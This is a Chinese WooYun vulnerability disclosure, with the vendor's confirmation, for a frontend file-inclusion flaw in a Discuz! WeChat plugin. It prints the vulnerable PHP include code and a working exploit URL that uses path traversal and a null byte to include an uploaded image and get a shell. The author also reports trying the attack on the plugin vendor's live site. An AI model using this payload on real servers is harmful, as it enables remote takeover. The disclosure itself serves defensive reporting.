Discuz! 微信公众平台插件前台任意文件包含，可直接shell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079517

漏洞标题：Discuz! 微信公众平台插件前台任意文件包含，可直接shell

漏洞作者： menmen519

提交时间：2014-10-15 18:59

修复时间：2015-01-13 19:00

公开时间：2015-01-13 19:00

漏洞类型：文件包含

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-15：细节已通知厂商并且等待厂商处理中
2014-10-16：厂商已经确认，细节仅向厂商公开
2014-10-19：细节向第三方安全合作伙伴开放
2014-12-10：细节向核心白帽子及相关领域专家公开
2014-12-20：细节向普通白帽子公开
2014-12-30：细节向实习白帽子公开
2015-01-13：细节向公众公开

简要描述：

Discuz! 插件前台文件包含，可直接shell，本来想拿下dz插件中心主站结果被可恶的百度云拦截，但是潜在问题还是存在

详细说明：

Discuz! 微信公众平台插件前台文件包含，可直接shell，直接看代码
hux_wx.inc.php：

<?php
if(!defined('IN_DISCUZ')) {
	exit('Access Denied');
}
$wxsetting = $_G['cache']['plugin']['hux_wx'];
$paymoney = "extcredits".$wxsetting['money'];
$paymoneyname = $_G['setting']['extcredits'][$wxsetting['money']]['title'];
$mycash = C::t('#hux_wx#hux_common_member_count')->result_by_uid($_GET['uid'],$paymoney);
$user_cm = C::t('#hux_wx#hux_common_member')->fetch_by_uid($_GET['uid'],'groupid');
$gp = unserialize($wxsetting['gp']);
$postgp = unserialize($wxsetting['postgp']);
$appconfigsql = C::t('#hux_wx#hux_wx_config')->fetch_by_appid($_GET['mod'],'configs');
if ($appconfigsql) {
	$appconfigs = explode('||',$appconfigsql['configs']);
	foreach($appconfigs as $value){ 
		$appconfigss = explode(':',$value);
		$appconfig[$appconfigss[0]] = $appconfigss[1];
	}
}
echo "gpc is ".get_magic_quotes_gpc()."<br>";
echo DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';
include DISCUZ_ROOT.'./source/plugin/hux_wx/mod/'.$_GET['mod'].'/'.$_GET['ac'].'.php';
?>

这里我们打印一下gpc 就是说明我们开启了这个功能
然后我们首先访问一下url：
http://localhost/Discuz_X3.2_SC_UTF8/upload/plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=data/attachment/album/201410/15/181713m2a8nnnzjv2i52n6.png%00

效果看到了之后我们再来看一下这个图片是怎么传递上去的，有是怎么找到的

啥也不说了，我们直接看插件中心的主站：http://www.hux.cc

这个居然首推主页，那就说明地位重要性
而且这个站点正好有上传相册，编辑相册的功能

这里被百度云waf拦截了，如果没有这个东西次主站就直接shell了
ok！！！！

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-10-16 09:19

厂商回复：

非常感谢您发现问题。我们会尽快联系该插件作者，在问题修复之前将该插件下架处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079517

漏洞标题：Discuz! 微信公众平台插件前台任意文件包含，可直接shell

相关厂商：Discuz!

漏洞作者： menmen519

提交时间：2014-10-15 18:59

修复时间：2015-01-13 19:00

公开时间：2015-01-13 19:00

漏洞类型：文件包含

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-079517

漏洞标题：Discuz! 微信公众平台插件前台任意文件包含，可直接shell

相关厂商：Discuz!

漏洞作者： menmen519

提交时间：2014-10-15 18:59

修复时间：2015-01-13 19:00

公开时间：2015-01-13 19:00

漏洞类型：文件包含

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-079517"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 menmen519@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：